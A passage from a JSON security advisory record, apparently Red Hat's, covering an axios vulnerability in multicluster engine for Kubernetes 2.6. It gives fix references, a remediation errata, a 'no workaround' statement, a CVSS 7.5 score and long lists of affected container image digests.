"https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57", "url": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57"}, {"category": "external", "summary": "https://github.com/axios/axios/releases/tag/v1.13.5", "url": "https://github.com/axios/axios/releases/tag/v1.13.5"}, {"category": "external", "summary": "https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433", "url": "https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433"}], "release_date": "2026-02-09T20:11:22.374000+00:00", "remediations": [{"category": "vendor_fix", "date": "2026-04-22T17:54:30+00:00", "details": "For multicluster engine for Kubernetes, see the following documentation for\ndetails on how to install the images:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.11/html/clusters/cluster_mce_overview#mce-install-intro", "product_ids": ["multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:32a81668f5cac70ec36ffc3caa97a4239d1840004afc8df2418e79bbbbf7c88d_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:394ac878a493ffd61692942614165e69acbdaaa37b1f9a460996dc52d8586b82_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:ba480c9b472e0746645bcebdd6ed5559b611d410d521637a9e7092ee925af91d_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:d564b6f6d156280a08c0f3585673a11c4a72acc74626b5780bb39b7141170a19_s390x"], "restart_required": {"category": "none"}, "url": "https://access.redhat.com/errata/RHSA-2026:9848"}, {"category": "workaround", "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", "product_ids": ["multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:407afc190324598e778fc09d218da552a2430612bad6b50ff9f6bc824b788dfc_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:437c27590382282a29dd543a69bbaed7ebd5421f73b98311c13f9e37c9ff553e_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:865fcb2f6796be98004ad84f0fffcd7200690f56ccccf5a39af4c5888abb213e_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:f82ac0d043682cc16fb832d9027464ee65f314d70ce98687f45db50e16d2b250_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:0768996d28693025a487c86c72debf1fda095282412b2c33ca0f21d8d9011b8a_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:5e84dda66a7735bbae425ac1a6b0e241662edb858476eb82adf72b7dff4b3916_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:9f13c6203d4ba9cde9bd8932b7e86c4a9c3396bb82235601b84f6743fb1b675f_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:ed05bbaa85197e21425ed8f503f74c6717bb6f2112e9b57c9b115071777c1995_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:2ec4baacabb144497ea62482a3c0ccafb9c3794c5c89f9aebbe855d7d9829dbe_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:72e64e8d1be38857af7beadc81e2f5f071f636b1d9233a70add5a1f18833ec45_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:c17a0ffd9c9546016a87cdd75adbaaa742f8637a0d81975d7b76662ffe5b069d_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:e05c6ff6a481e7956a58e07f10dc15470ef2af82966b2159260077bd6ba06cf7_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:4bef3dab9db981249b3a1b3a556e615226b29fdc7a6593a3970921799817129f_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:901dd1ad148b84d3c1bcfa71beeaf75b836bb382bf99893f65d4629d006bcfc7_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:abdca0cc6776dba16be873853e38bc62bb9d3f1eb80f1d4bcbe7829714a019b5_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:f856447bc82e37dc4da78639ff08bc1f4b4c4e0d75c3d1eeec81e3807c65ad7e_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:345d589cb55ccb8afb080f04054ebc30f0cf6383742ce750f4f5656e14f4db35_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:5557594c1ac0b047fea659868fdf71b8f16e0548abe8f41bf58ce80924701a16_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:8e08974a6dc10be9cb7d7a07527e8960cd93b76506355ce900e2e691208d1047_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:9d501eb84c2b7f9f860c5bb08d9adcc599e42ed0c3a0e24af3c32b686f005182_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:8690fcbd38eeec0cde0edc5c2e46683837d6247ce657c495fc791a0bb13c0450_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:b41036dc59ecfd530609349da9b73dec177184662aaf69bac35e67d245815d2a_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:b5a7706fc69c7e1b3ad3ff03c5b0e46b44cd93ce332a74acd43da8c86b6b7163_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:f0f363dc51f50bf822bff6b5f9072299c2404d8df1891243ae3ad6ba90c95f0a_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:212c9c73fd1050e3f202703e7c5c5a466d1931d918e3f730d2c56bb2629337e2_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:c6b10fd7009685d032e8c914cce4a1b2630ab99f2262fddd6dd32c048224e535_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:d26e9fe1bf09eb1c025e28c795debabe0dda6a3f0fa112a6507b8862489de361_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:e246eb1fb572fe7ad7058afd783020e77dd61699a5ffd290000e80baa6bc0454_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:c3754441d1af76c226983b48c57b537856da6cc21272008c05dfbb8e860d25f6_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:deacb2138fe3d8a8d9ddebbbc257b4ea5be376c26df0e46a276c631752ca8a16_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:e7f321893f0f76fcf0e83225502e1367752c24c449a44810ccbed08ee3af3efb_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:f33966f40e46d3815d0a8859b4fa802e48931ba8f95957c31c9d728f6ae42340_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:4b4a1fda57434c75499094003457759ec6d530ec8fcfc08c8e0c86fb6f33c68f_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:93eb3a376b3d3a878d104d8af966b8deaed7b26ceaf16bf337d70687e0e5fa17_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:c7f96198522ecf44c19fe190d603d94387b3a522e3210826c6c08c0999aabc56_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:da99e0676f28200a08e4996adb0d107713fd11f747df5abb8b58fbc95bcab827_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:43f0b3b75610ab9d19d261854e390dc01bf64777cce43a1076375b1580452908_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:583bf219ded8c4f21a696daa081720f3eb81c3676e0182fd246e6d4f1d3fb2f7_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:76a5e7db276463588b6a98c27fb8a24a8f85b73eef2fd4742b72690fa92decc3_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:8efc263d78912f66ee98a3717a8cefdeb6e6b87bd8f3788d4f3712d9000d031c_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:32a81668f5cac70ec36ffc3caa97a4239d1840004afc8df2418e79bbbbf7c88d_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:394ac878a493ffd61692942614165e69acbdaaa37b1f9a460996dc52d8586b82_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:ba480c9b472e0746645bcebdd6ed5559b611d410d521637a9e7092ee925af91d_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:d564b6f6d156280a08c0f3585673a11c4a72acc74626b5780bb39b7141170a19_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:27bb82aa0a0d0506fa45908892e379e4bf8190ee9512483c7d7b6a001eb37c09_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:4e8e3b7a8a317dda2ec47a53110467177015d9cec39ee64b819a133048ee06f2_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:9df56b21394d9b17bf70d49a367c004c4f76111bbcd0ae2046871631a914a5a4_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:ecc19a7bbdce3c0328fff1da64ae4f3959c9d0a67400cea11744bc5d336853ee_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:1f68b9c88d343654c87334fbc3b5c42338406b727da3c6bbf3b14fbef236b93a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:2eb31f9a7694f4b8690e168c0d8fcd0da42642ca87508e5199e4310fc56ea232_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:a1a514fcf09eda92d948a4375a599fcd45189a36a8748a2cf499a0fd12a7cb52_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:edc942a663b791725f358fcef40fe2de8ad55f8f81d7ac2ff239ccefbb24ea3c_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:221cce833cfe679a7ed2674f39ed6aae065939119702188811507cf7b672996c_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:bcb17131e9d74ac42ddcb1baf13c2697a72c07dd386b871032c34144be5d9647_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:d55c640d3df3705e8a861e7034f450d1c7bb5726251ba0384fd28b40bb178595_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:e006a8a7d0dc166885ba2a5f573128938ee6d56c882a71b68845b97e483d6e32_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:5c4384e6f2589dedfbb0942b40187a93581b07a724ec2a84189af4f617e9416b_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:5f68fd93ae28391c01fe0a44829f12494544b59c330a2902a6edaad45c7b02b3_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:b6f4af9508e1a5a312c274aa19fa280970d462e16857394d843c53358ee318c2_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:b9d178326c5f78df593cad595dd3b8a1329187d9f8d021201df726206b70bc49_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:2d23f9d25ffe94fbb9e794a61690cf08ac2888b053efc194c9abdcdeaea8fee5_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:3fbf4c46f032eb961dc7f519f38cd93e49839ac94761e6f43de0e648d75c241a_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:4196cd9623f2102f364c0662c6c6092efb19b2dba7bb60d0b156a12dccef9949_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:aaade5f90a49e8b49ccb8cc1fd74485ba78a37cab222676e2495500e95a911e6_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:07eaddc3666472876e1470d7d5bc49f28bce4176efbed07214d1284a785bc1de_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:0afadb8cc20a5a4a55a9762159ccd08de9c79abd5cd915f620eaedcae97e1dda_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:79cb2e32b2711d9986e53977c8757b2564ae3dc2cb82076adae43aeb61bc1499_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:bb24ce270fa3812316ec61cc7b5bf138ed54608e326d5ee783e040ca04b30c6e_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:df9600893f99f149e15fb4a0295ed978d0cc35141a67a3a9824d339a5e13e08f_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:ed9963c1c0f2535aa753ecf341ab45890c838c49719b189fa1149ce5a36f244c_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:f88156d91c826636ffbff092da3733a06f49f210d3f45c20b3d145b8033d3a14_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:fb23549a45050af95855906f65732389237ed6e907974600ee5f02fda696c7a7_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:08236bbe9754e0d9e8e11c1486fe81134ed8cb392f8157a9267e22823662fe83_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:3ef0376735304b9a8d46648aacc84adffbe3424d2ad790cbfd3a10888d60b54d_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:6ae974b35acc19fad0a42f0452bdb13d4d736ed59e3c9ce1ff448456f8f8cf3b_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:cd44c903b5ce3fc9f9c93be883f2a5c6106d1d86ad5a3596f8cb1ccb8ddc316c_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:48408e0a5ec56b32fb9cfddf696c91b3fa1890679643959f3b12ddf746ddfe40_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:6ebdb26020f475f5a9066777ea8aeb0bc6a99f93db9a7e6d1e0a6272528ce8e7_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:c67a2dc59ec90f77f8de8e72d4130f181e0ced37aba0a2b71d438e9221fd53fe_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:f076915d0170bd2a3ae4552c9a2199dcab7016f0fe4f9e6d027a474a81dffa44_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:08b253bbac766546380de11c4eb330ab1da4cf45bace66296d6ce71a46052ccc_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:3ed63b7040f9f2e43f3034c0b1ecd3479b6fb1e9cb45f34b65c6ba2cc0fdc6e1_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:491acfe31e1ded0bd8b5e6d4ce5115a5e1ef4b0ea5165635abcb21055a3c9f41_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:e32f3082cbed11fd6e5f1f65b58d9e2ab52df3298ecc63ce32dea78fdf36150e_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:071caf0cee1f904aaf5747b5c894f8e68e273c76b045e2e46f3fdc747fde0b52_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:222fb4df168138dfe036cba15b0592b8d85aeb0a3907cbbcb80caa148ebd5e75_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:76e5532fdd70e237898a03f7ab0304d44684ac4d78930c04140558b780e44284_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:a7d81f1ca5781bad0fdf032192994d7aebb438b67370526b7aaf24de26ea2a4a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:0389924d0daecd14270a2c80cf761400b2683b5d1f191ac63e09eddc33b6f459_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:54ec16d78dafc319cdd51ef6c7328ec9b6ad7fdf9cac5e4e47c1f510ad2a132a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:8c81477e75d355483f39b88ddfdd30b8ea6982a45aeb3cdc178b53f6e9198334_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:969cc2b05bb0fe1b00cfa728b6b0a741bf21e81aecae04aba1e0bbdd1921faa5_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:55abc89b8554cc3e314cf9f7f998101a931c3cf9b3b21e0f0cdbe26d5aba1be6_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:855c5cd1036f4a3c38f35f6d781e3f31941c91d61b699f4b714cda909b81bf70_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:cb3f786b682cc31995858194dec9dfdc1ac43f6a0ceb609364bbc07c732895e9_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:cc8fc81d0fb612703581e0df2f9b4262aae0d1f1af29a5facdf9dac567b95510_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:2b24bab2c9db586e3de204607f606c1577ab35ef78ce9cb154b08d56a3cb70d3_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:65ee7dbee80ad40347972f9a42cb18cde25554211afbb6f0e2c1aca3405e11f2_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:9ce62c421421c1c2739b1e79f010539134123583ebaef7274549ba49e1c0010a_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:9e7310305572d3bcbfca6bff55daa43a01039cc6384149b573c696335048e5a5_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:3764ca1ef9ed913896c0449b271706748517cf96e67d88ad491e225fcb0eb549_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:cd74d39b219e499f077516f6c229cddff21cd480d4ef33033d644bdbfb0b3682_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:d1b6093f101ae7e4956aad52d4de99c68472f86de3094c98fc4f290926a99f4a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:e84d9e60025112bcc466c1ab0c8b82dccafc34b85266f5650ff6c4fbdd9ad6c5_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:068f2fd00a2709d041c1eb2aab64ac4741a7a4b27475a722571a450ab496b655_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:2c8f4c88f1ac9cd64359e990530e27ad8c3ff590e17aca5a072ef0ec674f380d_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:817d332d90af406985a0611de4a171f7478d39f0afa1a6aafb7cf5eb7616ca78_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:b6b5e9e343849e851770dcdbf287b63de1a0cb8cec21cee9be2ef4fdcca445e3_amd64"]}], "scores": [{"cvss_v3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1"}, "products": ["multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:407afc190324598e778fc09d218da552a2430612bad6b50ff9f6bc824b788dfc_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:437c27590382282a29dd543a69bbaed7ebd5421f73b98311c13f9e37c9ff553e_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:865fcb2f6796be98004ad84f0fffcd7200690f56ccccf5a39af4c5888abb213e_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:f82ac0d043682cc16fb832d9027464ee65f314d70ce98687f45db50e16d2b250_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:0768996d28693025a487c86c72debf1fda095282412b2c33ca0f21d8d9011b8a_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:5e84dda66a7735bbae425ac1a6b0e241662edb858476eb82adf72b7dff4b3916_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:9f13c6203d4ba9cde9bd8932b7e86c4a9c3396bb82235601b84f6743fb1b675f_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:ed05bbaa85197e21425ed8f503f74c6717bb6f2112e9b57c9b115071777c1995_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:2ec4baacabb144497ea62482a3c0ccafb9c3794c5c89f9aebbe855d7d9829dbe_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:72e64e8d1be38857af7beadc81e2f5f071f636b1d9233a70add5a1f18833ec45_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:c17a0ffd9c9546016a87cdd75adbaaa742f8637a0d81975d7b76662ffe5b069d_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:e05c6ff6a481e7956a58e07f10dc15470ef2af82966b2159260077bd6ba06cf7_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:4bef3dab9db981249b3a1b3a556e615226b29fdc7a6593a3970921799817129f_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:901dd1ad148b84d3c1bcfa71beeaf75b836bb382bf99893f65d4629d006bcfc7_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:abdca0cc6776dba16be873853e38bc62bb9d3f1eb80f1d4bcbe7829714a019b5_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:f856447bc82e37dc4da78639ff08bc1f4b4c4e0d75c3d1eeec81e3807c65ad7e_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:345d589cb55ccb8afb080f04054ebc30f0cf6383742ce750f4f5656e14f4db35_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:5557594c1ac0b047fea659868fdf71b8f16e0548abe8f41bf58ce80924701a16_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:8e08974a6dc10be9cb7d7a07527e8960cd93b76506355ce900e2e691208d1047_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:9d501eb84c2b7f9f860c5bb08d9adcc599e42ed0c3a0e24af3c32b686f005182_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:8690fcbd38eeec0cde0edc5c2e46683837d6247ce657c495fc791a0bb13c0450_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:b41036dc59ecfd530609349da9b73dec177184662aaf69bac35e67d245815d2a_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:b5a7706fc69c7e1b3ad3ff03c5b0e46b44cd93ce332a74acd43da8c86b6b7163_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:f0f363dc51f50bf822bff6b5f9072299c2404d8df1891243ae3ad6ba90c95f0a_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:212c9c73fd1050e3f202703e7c5c5a466d1931d918e3f730d2c56bb2629337e2_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:c6b10fd7009685d032e8c914cce4a1b2630ab99f2262fddd6dd32c048224e535_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:d26e9fe1bf09eb1c025e28c795debabe0dda6a3f0fa112a6507b8862489de361_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:e246eb1fb572fe7ad7058afd783020e77dd61699a5ffd290000e80baa6bc0454_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:c3754441d1af76c226983b48c57b537856da6cc21272008c05dfbb8e860d25f6_arm64", 